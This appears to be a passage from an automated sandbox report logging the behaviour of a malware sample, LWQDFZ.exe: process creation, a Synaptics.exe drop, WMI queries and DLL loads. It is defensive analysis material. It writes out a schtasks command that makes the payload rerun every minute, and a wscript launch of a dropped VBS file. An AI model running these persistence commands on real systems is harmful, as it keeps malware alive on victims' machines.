                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_LWQDFZ.exe'
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                              Source: LWQDFZ.exeReversingLabs: Detection: 92%
                              Source: C:\Users\user\Desktop\LWQDFZ.exeFile read: C:\Users\user\Desktop\LWQDFZ.exeJump to behavior
                              Source: unknownProcess created: C:\Users\user\Desktop\LWQDFZ.exe "C:\Users\user\Desktop\LWQDFZ.exe"
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\Users\user\Desktop\._cache_LWQDFZ.exe "C:\Users\user\Desktop\._cache_LWQDFZ.exe"
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                              Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbs
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                              Source: unknownProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe "C:\Users\user\AppData\Roaming\Windata\KQNALS.exe"
                              Source: unknownProcess created: C:\Users\user\AppData\Roaming\Windata\KQNALS.exe C:\Users\user\AppData\Roaming\Windata\KQNALS.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12448
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12508
                              Source: C:\ProgramData\Synaptics\Synaptics.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7464 -s 12500
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\Users\user\Desktop\._cache_LWQDFZ.exe "C:\Users\user\Desktop\._cache_LWQDFZ.exe" Jump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeProcess created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdateJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1Jump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeProcess created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\MHDFGY.vbsJump to behavior
                              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn MHDFGY.exe /tr C:\Users\user\AppData\Roaming\Windata\KQNALS.exe /sc minute /mo 1
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: appresolver.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: bcp47langs.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: slc.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: sppc.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: policymanager.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: msvcp110_win.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: shacct.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: idstore.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: twinapi.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: samlib.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: wlidprov.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: samcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: provsvc.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: edputil.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: wintypes.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: twext.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: starttiledata.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: acppage.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: sfc.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: msi.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: aepic.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\LWQDFZ.exeSection loaded: sfc_os.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: mpr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: userenv.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: version.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: winmm.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: wbemcomn.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: amsi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: sxs.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: linkinfo.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: ntshrui.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: cscapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Users\user\Desktop\._cache_LWQDFZ.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                              Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: apphelp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: propsys.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                              Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: propsys.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: iphlpapi.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: mpr.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: userenv.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: uxtheme.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: version.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wininet.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: winmm.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wsock32.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: kernel.appcore.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: windows.storage.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: wldp.dll
                              Source: C:\Users\user\AppData\Roaming\Windata\KQNALS.exeSection loaded: propsys.dll
                              Source: C:\Users\user\Desktop\LWQDFZ.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
                              Source: MHDFGY.lnk.2.drLNK file: ..\..\..\..\..\Windata\KQNALS.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\gbvaaeG.iniJump to behavior
                              Source: Window RecorderWindow detected: More than 3 window changes detected
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                              Source: LWQDFZ.exeStatic file information: File size 1686528 > 1048576
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
